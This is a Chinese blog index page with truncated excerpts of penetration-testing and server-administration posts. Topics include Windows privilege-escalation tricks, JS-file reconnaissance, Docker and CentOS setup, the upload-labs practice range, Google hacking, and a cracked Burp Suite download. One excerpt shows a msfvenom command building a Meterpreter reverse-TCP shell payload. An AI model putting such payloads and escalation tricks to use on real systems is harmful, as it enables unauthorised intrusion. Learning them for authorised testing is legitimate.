各种提权姿势总结:
1.cmd拒绝访问就自己上传一个cmd.exe,自己上传的cmd是不限制后缀的,还可以是cmd.com cmd.txt cmd.rar等
2.net user不能执行有时候是net.exe被删除了,可以先试试net1,不行就自己上传一个net.exe
3.cm...
W•X
2周前 (03-26) 47℃
0喜欢
说在前面
在渗透测试及漏洞挖掘过程中,信息搜集是一个非常重要的步骤。而在网站的JS文件中,会存在各种对测试有帮助的内容。
比如:敏感接口,子域名等。
社区内的文章也有有些关于JS文件提取信息的片段,比如Brupsuite和LinkFinder结合的方式,但还是有些问题:不能提取子...
W•X
3周前 (03-17) 41℃
0喜欢
1. 生产搭建环境:
操作系统:CentOS7.5
内存大小:8GB
硬盘:100G
目录:
1、Docker安装
2、环境准备与清理
3、调优
Docker安装
1.1 Kernel调优
1.1.1. 配置系统内核参数
#vim /etc/sysctl.conf
net.i...
爱疯熊猫
2个月前 (02-19) 173℃
0喜欢
# cd /etc/yum.repos.d/
# mkdir repo_bak
# mv *.repo repo_bak/
2、下载新的CentOS-Base.repo 到/etc/yum.repos.d/
# wget -O /etc/yum.repos.d/CentOS-Ba...
W•X
2个月前 (02-19) 334℃
0喜欢
https://www.freebuf.com/articles/database/36777.html //mysql安全配置
https://www.cnblogs.com/ya-qiang/p/9094008.html //报错解决
———...
W•X
4个月前 (12-14) 254℃
0喜欢
upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。
详细文档、部署方式、访问:
GitHub: https://github.com/c0ny1/upload-labs
运行环境
操作系统...
W•X
4个月前 (12-11) 275℃
0喜欢
metasploit常用命令(二)
MSF Payloads
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> X > system.exe
msfvenom -p php/meterp...
W•X
4个月前 (12-10) 250℃
1喜欢
1.MSF终端命令
show exploit
列出metasploit框架中的所有渗透攻击模块。
show payloads
列出metasploit框架中的所有攻击载荷。
show auxiliary
列出metasploit框架中的所有辅助攻击模块。
search name
...
W•X
4个月前 (12-10) 162℃
0喜欢
google-hacking语法
使用Google等搜索引擎对某些特定的网络主机漏洞(通常是服务器上的脚本漏洞)进行搜索,以达到快速找到漏洞主机或特定主机的漏洞的目的。Google毫无疑问是当 今世界上最强大的搜索引擎。然而,在黑客手中,它也是一个秘密武器,它能搜索...
W•X
4个月前 (11-29) 375℃
1喜欢
最近用到Burp,于是找了下吾爱破解上的注册机的原版,也就是没有后门的版本.
注意!!!:Burp运行需要jre环境,下载burp后打不开的,请打开jre下载连接:
https://www.oracle.com/technetwork/java/javase/download...
W•X
5个月前 (11-09) 544℃
0喜欢
